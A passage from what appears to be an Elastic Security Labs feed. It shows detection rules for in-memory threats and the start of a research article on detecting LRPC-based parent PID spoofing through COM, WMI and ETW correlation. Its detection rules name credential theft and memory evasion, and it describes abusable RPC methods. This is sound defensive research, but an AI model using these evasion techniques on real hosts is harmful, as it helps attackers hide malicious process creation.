  process.parent.name : (&quot;WINWORD.EXE&quot;, &quot;EXCEL.EXE&quot;, &quot;POWERPNT.EXE&quot;, &quot;MSACCESS.EXE&quot;, &quot;mspub.exe&quot;, &quot;fltldr.exe&quot;, &quot;visio.exe&quot;) and
// excluding splwow64.exe only if its parent call stack is coming from the winspool.drv module
not (process.executable : &quot;?:\\Windows\\splwow64.exe&quot; and
 _arraysearch(process.parent.thread.Ext.call_stack, $entry, $entry.symbol_info:
  (&quot;?:\\Windows\\System32\\winspool.drv!OpenPrinter*&quot;,
  &quot;?:\\Windows\\SysWOW64\\winspool.drv!OpenPrinter*&quot;)))
</code></pre>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image3.jpg" alt="" /></p>
<p>To reduce event volumes, call stack information is collected on the endpoint and processed for detections, but not always streamed in events. To always include call stacks in streamed events, an advanced option is available in the Endpoint policy:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image7.jpg" alt="" /></p>
<h2>C2 Coverage</h2>
<p>Elastic Endpoint makes quick work of detecting some of the top C2 frameworks active today. See below for screenshots detecting Nighthawk, BruteRatel, CobaltStrike, and APT41’s <a href="https://www.trendmicro.com/vinfo/gb/security/news/cybercrime-and-digital-threats/earth-baku-returns">StealthVector</a>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image5.jpg" alt="" /></p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/image10.jpg" alt="" /></p>
<h2>Conclusion</h2>
<p>While this capability gives us a lead over the cutting edge of in-memory tradecraft today, attackers will no doubt develop <a href="https://labs.withsecure.com/publications/spoofing-call-stacks-to-confuse-edrs">new innovations</a> in attempts to evade it. That’s why we are already hard at work to deliver the next set of leading in-memory detections. Stay tuned!</p>
<h2>Resources</h2>
<p>Rules released with 8.8:</p>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_execution_from_a_macro_enabled_office_document.toml">Execution from a Macro Enabled Office Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/execution_suspicious_macro_execution_via_windows_scripts.toml">Suspicious Macro Execution via Windows Scripts</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_suspicious_file_dropped_by_a_macro_enabled_document.toml">Suspicious File Dropped by a Macro Enabled Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_shortcut_file_modification_via_macro_enabled_document.toml">Shortcut File Modification via Macro Enabled Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_dll_loaded_from_a_macro_enabled_document.toml">DLL Loaded from a Macro Enabled Document</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_process_creation_via_microsoft_office_add_ins.toml">Process Creation via Microsoft Office Add-Ins</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/persistence_registry_or_file_modification_from_suspicious_memory.toml">Registry or File Modification from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/credential_access_access_to_browser_credentials_from_suspicious_memory.toml">Access to Browser Credentials from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_ntdll_memory_unhooking.toml">Potential NTDLL Memory Unhooking</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_microsoft_common_language_runtime_loaded_from_suspicious_memory.toml">Microsoft Common Language Runtime Loaded from Suspicious Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_common_language_runtime_loaded_via_an_unsigned_module.toml">Common Language Runtime Loaded via an Unsigned Module</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_masquerading_as_windows_error_manager.toml">Potential Masquerading as Windows Error Manager</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_image_load_via_ldrloaddll.toml">Suspicious Image Load via LdrLoadDLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_library_loaded_via_a_callback_function.toml">Library Loaded via a CallBack Function</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_modified_ntdll.toml">Process Creation from Modified NTDLL</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_dll_side_loading_via_a_copied_microsoft_executable.toml">DLL Side Loading via a Copied Microsoft Executable</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_injection_via_the_console_window_class.toml">Potential Injection via the Console Window Class</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_suspicious_unsigned_dll_loaded_by_a_trusted_process.toml">Suspicious Unsigned DLL Loaded by a Trusted Process</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_stared_via_remote_thread.toml">Process Started via Remote Thread</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_injection_via_dotnet_debugging.toml">Potential Injection via DotNET Debugging</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_process_creation_via_shellcode.toml">Potential Process Creation via ShellCode</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_module_stomping_form_a_copied_library.toml">Module Stomping from a Copied Library</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_a_stomped_module.toml">Process Creation from a Stomped Module</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_parallel_ntdll_loaded_from_unbacked_memory.toml">Parallel NTDLL Loaded from Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_operation_via_direct_syscall.toml">Potential Operation via Direct Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_potential_process_creation_via_direct_syscall.toml">Potential Process Creation via Direct Syscall</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_from_archive_or_removable_media_via_unbacked_code.toml">Process from Archive or Removable Media via Unbacked Code</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_network_module_loaded_from_suspicious_unbacked_memory.toml">Network Module Loaded from Suspicious Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_rundll32_or_regsvr32_loaded_a_dll_from_unbacked_memory.toml">Rundll32 or Regsvr32 Loaded a DLL from Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_windows_console_execution_from_unbacked_memory.toml">Windows Console Execution from Unbacked Memory</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_process_creation_from_unbacked_memory_via_unsigned_parent.toml">Process Creation from Unbacked Memory via Unsigned Parent</a></li>
</ul>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks/blog-thumb-coin-stacks.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Effective Parenting - detecting LRPC-based parent PID spoofing]]></title>
            <link>https://www.elastic.co/kr/security-labs/effective-parenting-detecting-lrpc-based-parent-pid-spoofing</link>
            <guid>effective-parenting-detecting-lrpc-based-parent-pid-spoofing</guid>
            <pubDate>Wed, 29 Mar 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.]]></description>
            <content:encoded><![CDATA[<p>Adversaries currently utilize <a href="https://docs.microsoft.com/en-us/windows/win32/rpc/">RPC</a>’s client-server architecture to obfuscate their activities on a host – including <a href="https://docs.microsoft.com/en-us/windows/win32/com/com-technical-overview#remoting">COM</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture">WMI</a> which are both RPC-based. For example, a number of local RPC servers will happily launch processes on behalf of a malicious client - and that form of defense evasion is difficult to flag as malicious without being able to correlate it with the client.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image23.jpg" alt="Annotated process tree showing the breaks in the behaviour graph" /></p>
<p>The above annotated screenshot is the logical process tree after a Microsoft Word macro called three COM objects, each exposing a <code>ShellExecute</code> interface and also the WMI <code>Win32_Process::Create</code> method. The WMI call has specialized telemetry that can reconstruct that Microsoft Word initiated the process creation (the blue arrow), but the COM calls don’t (the red arrows). So defenders have no visibility that Microsoft Word made a COM call over an RPC call to spawn PowerShell elsewhere on the system.</p>
<p>The defender is left with a challenge to interpretation because of this lack of context - Word spawning PowerShell is a red flag, but is <em>Explorer</em> spawning PowerShell malicious, or simply user behavior?</p>
<p>RPC will typically use <a href="https://learn.microsoft.com/en-us/windows/win32/rpc/selecting-a-protocol-sequence">LRPC</a> as the transport for inter-process communication. Using process creation as a case study, this research will outline the evasion-detection arms race to date, describe the weaknesses in some current detection approaches and then follow the quest for a generic approach to LRPC-based evasion.</p>
<h2>A Brief History of Child Process Evasion</h2>
<p>It is often very beneficial for adversaries to spawn child processes during intrusions. Using legitimate pre-installed system tools to achieve your aims saves on capability development time and can potentially evade security instrumentation by providing a veneer of legitimacy for the activity.</p>
<p>However, for the activity to look plausibly legitimate, the parent process also needs to seem plausible. The classic counter-example is that Microsoft Word spawning PowerShell is highly anomalous. In fact, Elastic SIEM includes a prebuilt rule to detect <a href="https://www.elastic.co/kr/guide/en/security/current/suspicious-ms-office-child-process.html">suspicious MS Office child processes</a> and Elastic Endpoint will also <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/initial_access_powershell_obfuscation_spawned_via_microsoft_office.toml">prevent malicious execution</a>. As documented in the Elastic <a href="https://www.elastic.co/kr/explore/security-without-limits/global-threat-report">Global Threat Report</a>, suspicious parent/child relationships were one of the three most common defense evasion techniques used by threats in 2022.</p>
<p>Endpoint Protection Platform (EPP) products could prevent the most egregious process parent relationships, but it was the rise of Endpoint Detection and Response (EDR) approaches with pervasive process start logging and the ability to retrospectively hunt that established a scalable approach to anomalous process tree detection.</p>
<p>Adversaries initially pivoted to evasions using a <a href="https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/">Win32 API feature introduced in Windows Vista</a> to support User Account Control (UAC) that allows a process to specify a different logical parent process to the real calling process. However, <a href="https://blog.f-secure.com/detecting-parent-pid-spoofing/">endpoint security could still identify the real parent process</a> based on the calling process context during the <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nf-ntddk-pssetcreateprocessnotifyroutine">process creation notification callback</a>, and <a href="https://www.elastic.co/kr/guide/en/security/current/parent-process-pid-spoofing.html">detection rule</a> coverage was quickly re-established.</p>
<p>New evasion techniques evolved in response, and a common method currently leveraged by adversaries is to indirectly spawn child processes via RPC – including <a href="https://docs.microsoft.com/en-us/windows/win32/com/com-technical-overview#remoting">DCOM</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmi-architecture">WMI</a> which are both RPC-based. RPC can be either inter-host or simply inter-process. The latter is oxymoronically called Local Remote Procedure Call (LRPC).</p>
<p>The most well-known of these was the <a href="https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/create-method-in-class-win32-process"><code>Win32_Process::Create</code></a> WMI method. In order to detect this, Microsoft appears to have explicitly added a new <a href="https://github.com/jdu2600/Windows10EtwEvents/blame/master/manifest/Microsoft-Windows-WMI-Activity.tsv"><code>Microsoft-Windows-WMI-Activity</code></a> ETW event in Windows 10 1809. The new event 23 included the client process id - the missing data point needed to associate the activity with a requesting client.</p>
<p>Unfortunately, adversaries were quickly able to pivot to alternate process-spawning out-of-process RPC servers such as <a href="https://learn.microsoft.com/en-us/previous-versions/windows/desktop/mmc/view-executeshellcommand"><code>MMC20.Application::ExecuteShellCommand</code></a>. Waiting for Microsoft to add telemetry to dual-purpose out-of-process RPC servers <a href="https://en.wikipedia.org/wiki/Whac-A-Mole">one-by-one</a> wasn’t going to be a viable detection approach, so last year we set out on a side quest to generically associate LRPC server actions with the requesting LRPC client process.</p>
<h2>Detecting LRPC provenance</h2>
<p>The majority of previous public RPC telemetry research has focused on inter-host lateral movement – typically spawning a process on a remote host. For example:</p>
<ul>
<li><a href="https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/">Lateral Movement using the MMC20.Application COM Object</a></li>
<li><a href="https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/">Lateral Movement via DCOM: Round 2</a></li>
<li><a href="https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/">Endpoint Detection of Remote Service Creation and PsExec</a></li>
<li><a href="https://posts.specterops.io/utilizing-rpc-telemetry-7af9ea08a1d5">Utilizing RPC Telemetry</a></li>
<li><a href="https://www.elastic.co/kr/blog/hunting-for-lateral-movement-using-event-query-language">Detecting Lateral Movement techniques with Elastic</a></li>
<li><a href="https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/">Stopping Lateral Movement via the RPC Firewall</a></li>
</ul>
<p>The ultimate advice for defenders is typically to monitor RPC network traffic for anomalies or, better yet, to block unnecessary remote access to RPC interfaces with <a href="https://www.akamai.com/blog/security/guide-rpc-filter">RPC Filters</a> (part of the <a href="https://learn.microsoft.com/en-us/windows/win32/fwp/">Windows Filtering Platform</a>) or specific RPC methods with 3rd party tooling like <a href="https://github.com/zeronetworks/rpcfirewall">RPC Firewall</a>.</p>
<p>Unfortunately these approaches don’t work when the adversary uses RPC to spawn a process elsewhere on the same host. In this case, the RPC transport is typically <a href="https://learn.microsoft.com/en-us/windows/win32/etw/alpc">ALPC</a> - monitoring and filtering at the network layer does not then apply.</p>
<p>On the host, detection engineers typically look to leverage telemetry from the inbuilt Event Tracing (including EventLog) in the first instance. If this proves insufficient, then they can investigate custom approaches such as user-mode function hooking or mini-filter drivers.</p>
<p>In the RPC case, <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/master/manifest/Microsoft-Windows-RPC.tsv"><code>Microsoft-Windows-RPC</code></a> ETW events are very useful for identifying anomalous behaviours.</p>
<p>Especially:</p>
<ul>
<li>Event 5 - <code>RpcClientCallStart</code> (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)</li>
<li>Event 6 - <code>RpcServerCallStart</code> (GUID InterfaceUuid, UInt32 ProcNum, UInt32 Protocol, UnicodeString NetworkAddress, UnicodeString Endpoint, UnicodeString Options, UInt32 AuthenticationLevel, UInt32 AuthenticationService, UInt32 ImpersonationLevel)</li>
</ul>
<p>Additionally, <code>RpcClientCallStart</code> is generated by the client and <code>RpcServerCallStart</code> by the server so the ETW headers will provide the client and server process ids respectively. Further, there is a 1:1 mapping between endpoint addresses and server process ids. So the server process can be inferred from the <code>RpcClientCallStart</code> event.</p>
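<p>As a rough illustration of that inference, the Python sketch below maintains the endpoint-to-server mapping learned from <code>RpcServerCallStart</code> headers and uses it to resolve the server process for a client event. The event dictionaries, field names, and function names here are illustrative assumptions, not a real ETW consumer API.</p>

```python
# Hypothetical sketch: infer the server PID for an RPC client call via the
# 1:1 endpoint-to-server-process mapping described above. Event shape is
# illustrative (dicts with ETW-header-like fields), not a real consumer API.

endpoint_to_server_pid = {}

def on_server_call_start(event):
    # RpcServerCallStart (event 6) is emitted in the server process, so the
    # ETW header PID identifies the server listening on this endpoint.
    endpoint_to_server_pid[event["Endpoint"]] = event["header_pid"]

def on_client_call_start(event):
    # RpcClientCallStart (event 5) carries the endpoint; the server PID can
    # then be inferred from the mapping built above.
    return {
        "client_pid": event["header_pid"],
        "server_pid": endpoint_to_server_pid.get(event["Endpoint"]),
        "interface": event["InterfaceUuid"],
        "opnum": event["ProcNum"],
    }
```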
<p>The RPC interface UUID and procedure number combined with the caller details are (usually) sufficient to identify intent. For example, RPC interface UUID <code>{367ABB81-9844-35F1-AD32-98F038001003}</code> is the Service Control Manager Remote Protocol, which exposes the ability to configure Windows services. Procedure number (opnum) 12 in this interface is <code>RCreateServiceW</code>, which notoriously is the method that PsExec uses to execute processes on remote systems.</p>
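<p>Conceptually, that intent lookup is just a table keyed on interface UUID and opnum. A minimal Python sketch, populated only with the SCM example from above (any further table contents would need to be curated from protocol documentation):</p>

```python
# Minimal sketch: classify an RPC call by (interface UUID, opnum).
# Only the Service Control Manager Remote Protocol example from the text is
# included; descriptions are illustrative labels, not canonical names.
KNOWN_METHODS = {
    ("367abb81-9844-35f1-ad32-98f038001003", 12):
        "svcctl!RCreateServiceW (PsExec-style service creation)",
}

def classify(interface_uuid: str, opnum: int) -> str:
    # Normalize the UUID so either case matches the table key.
    return KNOWN_METHODS.get((interface_uuid.lower(), opnum), "unknown")
```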
<p>For endpoint security vendors, however, there are a few issues to address before scalable, robust <code>Microsoft-Windows-RPC</code> detections would be possible:</p>
<ol>
<li>RPC event volumes are significant</li>
<li>There isn't an obvious mechanism to strongly correlate a client call with the resultant server call</li>
<li>There isn’t an obvious mechanism to strongly correlate a server call with the resultant server behavior</li>
</ol>
<p>Let’s address these three issues one by one.</p>
<h3>LRPC event volumes</h3>
<p>There are thousands of LRPC events each second – and most of them are uninteresting. To address the LRPC event volume concern, we could limit the events to just those RPC events that are inter-process (including inter-host). However, this immediately leads to the second concern. We need to identify the client of each server call in order to reduce event volumes down to just those which are inter-process.</p>
<h3>Correlating RPC server calls with their clients</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image7.jpg" alt="Annotated MSDN RPC architecture" /></p>
<p>Modern Windows RPC has roughly three <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/472083a9-56f1-4d81-a208-d18aef68c101">transports</a>:</p>
<ul>
<li>TCP/IP (ncacn_ip_tcp, ncacn_http, ncadg_ip_udp, and ncacn_np over SMB)</li>
<li>inter-process Named Pipes (direct ncacn_np)</li>
<li>inter-process ALPC (ncalrpc)</li>
</ul>
<p>The <code>RpcServerCallStart</code> event alone is not sufficient to determine if the call was inter-process. It needs to be correlated against a preceding <code>RpcClientCallStart</code> event, and <a href="https://stackoverflow.com/questions/41504738/how-to-correlate-rpc-calls-in-etw-traces">this correlation</a> is unfortunately weak. At best you can identify a pair of <code>RpcServerCall</code> start/stop events that are bracketed by a pair of <code>RpcClientCall</code> events with the same parameters. (Note - for performance reasons, ETW events generated from different threads may arrive out of order). This means that you need to maintain a holistic RPC state - which creates an on-host storage and processing volume concern in order to address the event volume concern.</p>
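<p>A rough Python sketch of this weak bracketing correlation, under the simplifying assumptions that events carry a sortable timestamp and that a call is keyed by its interface UUID, opnum, and endpoint (real ETW streams are messier than this):</p>

```python
# Hypothetical sketch of the weak "bracketing" correlation: a server call is
# attributed to a client only when its start/stop pair falls inside an open
# client start/stop pair with the same (InterfaceUuid, ProcNum, Endpoint) key.
from collections import defaultdict

def correlate(events):
    """events: list of (timestamp, kind, key, pid), where kind is one of
    'client_start', 'client_stop', 'server_start', 'server_stop'."""
    open_clients = defaultdict(list)  # key -> stack of (start_ts, client_pid)
    open_servers = {}                 # key -> (start_ts, server_pid)
    matches = []
    for ts, kind, key, pid in sorted(events):  # tolerate out-of-order arrival
        if kind == "client_start":
            open_clients[key].append((ts, pid))
        elif kind == "server_start":
            open_servers[key] = (ts, pid)
        elif kind == "server_stop":
            server = open_servers.pop(key, None)
            if server and open_clients[key]:
                # server call bracketed by an open client call: weak match
                matches.append({"client_pid": open_clients[key][-1][1],
                                "server_pid": server[1], "key": key})
        elif kind == "client_stop" and open_clients[key]:
            open_clients[key].pop()
    return matches
```

Note that the whole trace has to be buffered and sorted first, which is exactly the on-host storage and processing concern described above.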
<p>More importantly though, the <code>RpcClientCallStart</code> events are generated in the client process where an adversary has already achieved execution and therefore can be <a href="https://twitter.com/dez_/status/938074904666271744">intercepted with very little effort</a>. There is little point to implementing a detection for something so trivial to circumvent, especially when there are more effective options.</p>
<p>Ideally, the RPC server would access the client details and directly log this information. Unfortunately, the ETW events don’t include this information - which is not surprising since one of the RPC design goals was simplification through abstraction. The RPC runtime (allegedly) can be configured via Group Policy to do exactly this, though. It can store <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/enabling-rpc-state-information">RPC State Information</a> which can then be used during debugging to <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/identifying-the-caller-from-the-server-thread">identify the client caller from the server thread</a>. Unfortunately the Windows XP era documentation didn’t immediately work for Windows 10.</p>
<p>It did provide a rough outline describing how to address the first two problems: reducing event volumes and correlating server calls to client processes. It is possible to hook the RPC runtime in all RPC servers, account for the various transports, and then log or filter inter-process RPC events only. (This is likely akin to how <a href="https://github.com/zeronetworks/rpcfirewall">RPC Firewall</a> handles network RPC - just with local endpoints).</p>
<h3>Correlating RPC server calls and resultant behavior</h3>
<p>The next problem was how to correctly attribute a specific server call to the resultant server behaviour. On a busy server, how could we tie an opaque call to the <code>ExecuteShellCommand</code> method to a specific process creation event? And what if the call came from script-based malware and was further wrapped under a method like <a href="https://learn.microsoft.com/en-us/windows/win32/api/oaidl/nf-oaidl-idispatch-invoke"><code>IDispatch::Invoke</code></a>?</p>
<p>We didn’t want to have to inspect the RPC parameter blob and individually implement parsing support for each abusable RPC method.</p>
<h4>Introducing ETW’s ActivityId</h4>
<p>Thankfully, Microsoft had already thought of this scenario and <a href="https://docs.microsoft.com/en-us/archive/msdn-magazine/2007/april/event-tracing-improve-debugging-and-performance-tuning-with-etw">provides ETW tracing guidance</a> to developers.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image17.png" alt="Annotated MSDN documentation for EventWriteEx" /></p>
<p>They suggest that developers generate and propagate a unique 128-bit <code>ActivityId</code> between related ETW events to enable end-to-end tracing scenarios. This is typically handled automatically by ETW for events generated on the same thread, as the value is stored in thread-local storage. However, the developer must manually propagate this ID to related activities performed by other threads… or processes. As long as the RPC Runtime and all Microsoft RPC servers had followed ETW tracing best practices, we should finally have the end-to-end correlation we want!</p>
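<p>The thread-locality caveat is easy to demonstrate outside ETW. The pure-Python analogy below (not the actual ETW mechanism) stores an ID in thread-local storage: it is visible on the thread that set it, and silently absent on a worker thread that was never explicitly handed it.</p>

```python
# Pure-Python analogy for the per-thread ActivityId: stored in thread-local
# storage, so a worker thread that never received it logs without it.
import threading
import uuid

_tls = threading.local()

def set_activity_id():
    _tls.activity_id = uuid.uuid4()

def log_event():
    # Mirrors an event write picking up the per-thread ActivityId:
    # returns None on threads where it was never set.
    return getattr(_tls, "activity_id", None)

set_activity_id()
on_request_thread = log_event()  # ActivityId present on this thread

result = {}
worker = threading.Thread(target=lambda: result.update(w=log_event()))
worker.start()
worker.join()
on_worker_thread = result["w"]   # None: the correlation is silently lost
```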
<p>It was time to break out a decompiler (we like Ghidra but there are many options) and inspect rpcrt4.dll. By looking at the first parameter passed to <a href="https://learn.microsoft.com/en-us/windows/win32/api/evntprov/nf-evntprov-eventregister"><code>EventRegister</code></a> calls, we can see that there are three ETW GUIDs in the RPC runtime. These GUIDs are defined in a contiguous block and helpfully came with public symbols.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image5.jpg" alt="" /></p>
<p>These GUIDs correspond to <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-RPC.tsv"><code>Microsoft-Windows-RPC</code></a>, <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-Networking-Correlation.tsv"><code>Microsoft-Windows-Networking-Correlation</code></a> and <a href="https://github.com/jdu2600/Windows10EtwEvents/blob/086d88e58d6e063868ec62a10f9e1b33e8694735/manifest/Microsoft-Windows-RPC-Events.tsv"><code>Microsoft-Windows-RPC-Events</code></a> respectively. Further, the RPC runtime helpfully wraps calls to <code>EventWrite</code> in just two places.</p>
<p>The first call is in <code>McGenEventWrite_EtwEventWriteTransfer</code> and looks like this:</p>
<pre><code>EtwEventWriteTransfer(RegHandle, EventDescriptor, NULL, NULL, UserDataCount, UserData);
</code></pre>
<p>The NULL parameters mean that <code>ActivityId</code> will always be the configured per-thread <code>ActivityId</code> and <code>RelatedActivityId</code> will always be excluded in events logged by this code path.</p>
<p>The second call is in <code>EtwEx_tidActivityInfoTransfer</code> and looks like this:</p>
<pre><code>EtwEventWriteTransfer(Microsoft_Windows_Networking_CorrelationHandle, EventDescriptor, ActivityId, RelatedActivityId, UserDataCount, UserData);
</code></pre>
<p>This means that <code>RelatedActivityId</code> will only ever be logged in <code>Microsoft-Windows-Networking-Correlation</code> events. RPC Runtime <code>ActivityId</code>s are (predominantly) created within a helper function that ensures that this correlation is always logged.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image14.jpg" alt="Ghidra decompilation for RPC ActivityId creation" /></p>
<p>Decompilation also revealed that the RPC runtime allocates ETW <code>ActivityId</code>s by calling <code>UuidCreate</code>, which generates a random 128-bit value. This is done in locations such as <code>NdrAsyncClientCall</code> and <code>HandleRequest</code>. In other words, the client and server each allocate their own <code>ActivityId</code>s. This isn’t surprising, because the DCE/RPC specification doesn’t seem to include a transaction id or similar construct that would allow the client to propagate an <code>ActivityId</code> to the server. That’s okay though: we’re only currently missing the correlation between the server call and the resultant behaviour. Also, we don’t want to trust any potentially tainted client-supplied information.</p>
<p>So now we know exactly how RPC intends to correlate activities triggered by RPC calls: by setting the per-thread ETW <code>ActivityId</code> and by logging RPC <code>ActivityId</code> correlations to <code>Microsoft-Windows-Networking-Correlation</code>. The next question is whether the Microsoft RPC interfaces that support dual-purpose activities, such as process spawning, propagate the <code>ActivityId</code> appropriately.</p>
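<p>Given those correlation events, reconstructing a causality chain is a simple parent-pointer walk. A hypothetical Python sketch (the event shape is illustrative; each correlation event ties a new <code>ActivityId</code> to its <code>RelatedActivityId</code> parent):</p>

```python
# Hypothetical sketch: rebuild an activity chain from correlation events,
# each mapping ActivityId -> RelatedActivityId (its parent activity).
def build_chain(correlation_events, leaf_activity_id):
    parent = {e["ActivityId"]: e["RelatedActivityId"] for e in correlation_events}
    chain, cur = [leaf_activity_id], leaf_activity_id
    while cur in parent:
        cur = parent[cur]
        chain.append(cur)
    return chain  # leaf first, root last
```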
<p>We looked at the execution traces for the four indirect process creation examples from our initial case study. In each one, the RPC request was received on one thread, a second thread handled the request and a third thread spawned the process. Other than the timing, there appeared to be no possible mechanism to link the activities.</p>
<p>Unfortunately, while the RPC subsystem is well behaved, most RPC servers aren't – though this likely isn't entirely their fault. The <code>ActivityId</code> is only preserved per-thread so if the server uses a worker thread pool (as per Microsoft’s <a href="https://learn.microsoft.com/en-us/windows/win32/rpc/scalability">RPC scalability</a> advice) then the causality correlation is implicitly broken.</p>
<p>Further, kernel ETW events seem to universally log an <code>ActivityId</code> of <code>{00000000-0000-0000-0000-000000000000}</code> – even when the thread has a (user-mode) <code>ActivityId</code> configured. It is likely that the kernel implementation of <code>EtwWriteEvent</code> simply does not query the <code>ActivityId</code> which is stored in user-mode thread local storage.</p>
<p>This observation about kernel events is a showstopper for a generic approach based around ETW. Almost all of the interesting resultant server behaviors (process, registry, file etc) are logged by kernel ETW events.</p>
<p>A new approach was necessary. It isn’t scalable to investigate individual ETW providers in dual-purpose RPC servers. (Though the <code>Microsoft.Windows.ShellExecute</code> TraceLogging provider looked interesting). What would Microsoft do?</p>
<h3>What would Microsoft do?</h3>
<p>More specifically, how does Microsoft populate the <code>ClientProcessId</code> in the <code>Microsoft-Windows-WMI-Activity</code> ETW event 23 (aka <code>Win32_Process::Create</code>)?</p>
<pre><code>task_023(UnicodeString CorrelationId, UInt32 GroupOperationId, UInt32 OperationId, UnicodeString Commandline, UInt32 CreatedProcessId, UInt64 CreatedProcessCreationTime, UnicodeString ClientMachine, UnicodeString ClientMachineFQDN, UnicodeString User, UInt32 ClientProcessId, UInt64 ClientProcessCreationTime, Boolean IsLocal)
</code></pre>
<p>Unlike RPC, WMI natively supports end-to-end tracing via a <code>CorrelationId</code> which is a GUID that the WMI client passes to the server at the WMI layer so that WMI operations can be associated. However, for security use cases, we shouldn’t blindly trust client-supplied information for reasons previously mentioned.</p>
<p>But how was Microsoft determining the process id to log and was their approach something that could be replicated for other RPC Servers – possibly via an RPC server runtime hook?</p>
<p>We needed to find out where the data in that field came from. ETW conveniently provides the ability to record a stack trace when an event is generated and the <a href="https://github.com/pathtofile/Sealighter">Sealighter</a> tool conveniently exposes this capability. Sealighter illustrates which specific ETW Write function is being called from which process.</p>
